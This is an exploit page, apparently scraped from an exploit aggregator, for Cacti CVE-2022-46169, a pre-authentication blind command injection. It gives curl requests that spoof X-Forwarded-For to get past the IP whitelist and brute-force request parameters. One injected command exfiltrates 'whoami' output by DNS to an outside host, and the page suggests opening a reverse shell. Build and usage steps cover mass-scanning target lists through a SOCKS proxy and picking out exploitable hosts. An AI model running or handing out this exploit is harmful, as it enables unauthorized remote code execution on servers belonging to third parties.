Exploit for OS Command Injection in Cacti CVE-2022-46169

Name: Exploit for OS Command Injection in Cacti CVE-2022-46169
Rating: 5 (365 reviews)
2022-12-16 | CVSS 7.5
## https://sploitus.com/exploit?id=22AF6966-7EAC-508E-AE8A-9444BFC5F2FC
# CVE-2022-46169

Cacti Blind Remote Code Execution (Pre-Auth)

## Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

## Explanation

This script bruteforces variables required to exploit this vulnerability. This exploit requires the following 3 variables:

- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter

The file `remote_agent.php` is protected by a IP whitelist. You can bypass this by spoofing your IP address in the `X-Forwarded-IP` header. Most instances will have `127.0.0.1` or the server's own IP address whitelisted.

Next you need to bruteforce the `host_id` and `local_data_ids` request parameters. This is done by enumerating pairs of integers `x,y` from a default min value of 1 and max value of 10.

Example Request

```sh
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]
```

## Exploitation

After you've gotten these 3 variables, you can inject a shell command into the `poller_id` key and escape it by putting a `;` before your command.

This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL encode your the `poller_id` value!

The following executes the command `ping $(whoami).test.com`

```sh
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"
```

## Output

The script oututs in a CSV format. The headers are `"target", "ip", "host_id", "data_id", "url"`.

If the `url` value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.

## Parsing Output

You can use the following commands to quickly parse the output file

### Targets with IP restriction bypassed

```sh
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
```

### Exploitable Targets

```sh
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 
```

## Build

```sh
go build -v -o bruteforce bruteforce.go
```

## Usage

```sh
./bruteforce -l targets.txt -t 50 -min 1 -max 10
```

- **Targets must be a list of IP addresses, port may be omitted**
- Socks5 proxy is supported `-proxy socks5://127.0.0.1:9050`
- Default output file is `results.csv`